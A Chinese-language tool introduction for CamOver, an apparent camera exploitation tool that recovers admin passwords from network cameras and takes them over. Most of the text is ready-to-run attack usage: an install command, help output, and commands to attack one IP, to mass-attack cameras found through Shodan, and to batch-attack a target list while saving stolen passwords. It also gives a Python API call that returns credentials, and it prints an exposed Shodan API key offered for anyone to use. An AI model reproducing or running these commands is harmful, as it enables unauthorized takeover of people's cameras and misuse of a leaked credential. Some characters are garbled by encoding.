CamOver:一款功能強大的攝像頭漏洞利用工具
關于CamOver
CamOver是一款功能強大的攝像頭漏洞利用工具,在該工具的幫助下,廣大研究人員可以輕松破解掉你家網絡攝像頭的管理員密碼,并接管你的攝像頭。
功能介紹
- 該工具能夠發(fā)現并利用大多數主流型號網絡攝像頭中的安全漏洞,例如CCTV、GoAhead和Netwave等。
- 經過優(yōu)化,支持多線程同時攻擊多個攝像頭。
- 簡單的命令行接口和API用法。
工具安裝
由于CamOver使用Python3開發(fā),因此首先需要在本地設備上安裝并配置好Python3環(huán)境。接下來,廣大研究人員可以使用下列命令下載并安裝CamOver:
- pip3 install git+https://github.com/EntySec/CamOver
基礎使用
CamOver的使用非常簡單,我們只需要在命令行終端中輸入“camover”命令即可使用CamOver:
- usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
- [--zoomeye ZOOMEYE] [-p PAGES]
- CamOver is a camera exploitation tool that allows to disclosure network camera
- admin password.
- optional arguments:
- -h, --help 顯示這個幫助信息并退出
- -t, --threads 啟用多線程模式以獲得更好的性能
- -o OUTPUT, --output OUTPUT
- 將結果存儲至文件
- -i INPUT, --input INPUT
- 地址輸入文件
- -a ADDRESS, --address ADDRESS
- 提供單個地址
- --shodan SHODAN 通過網絡利用遠程設備所使用的Shodan API密鑰
- --zoomeye ZOOMEYE 通過網絡利用遠程設備所使用的ZoomEye API密鑰
- -p PAGES, --pages PAGES
- 需要通過ZoomEye獲取的頁面數量
工具使用樣例
(1) 攻擊單個攝像頭
下列命令可以攻擊單個網絡攝像頭:
- camover -a 192.168.99.100
(2) 通過網絡攻擊遠程攝像頭
接下來,我們可以使用Shodan搜索引擎來搜索并攻擊網絡上的攝像頭,此時我們可以使用-t參數來設置多線程數量以獲得更好的性能:
- camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:項目中給出的Shodan API密鑰(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是開發(fā)人員自己的專業(yè)版API密鑰,你可以使用你自己的密鑰,當然了你想用開發(fā)人員的也沒意見,大家資源共享嘛!
(3) 從輸入文件獲取目標攝像頭
我們還可以使用開放數據庫中提供的攝像頭地址,此時我們可以使用-t參數來設置多線程數量以獲得更好的性能:
- camover -t -i cameras.txt -o passwords.txt
注意:此命令將會攻擊cameras.txt中給出的所有攝像頭,并會將所有獲取到的密碼存儲至passwords.txt文件中。
API使用
CamOver還提供了自己的Python API,可以將其導入至你們自己的項目代碼中并調用其功能:
- from camover import CamOver
調用樣例
攻擊單個攝像頭:
- from camover import CamOver
- camover = CamOver()
- creds = camover.exploit('192.168.99.100')
- print(creds)
項目地址
CamOver:【GitHub傳送門】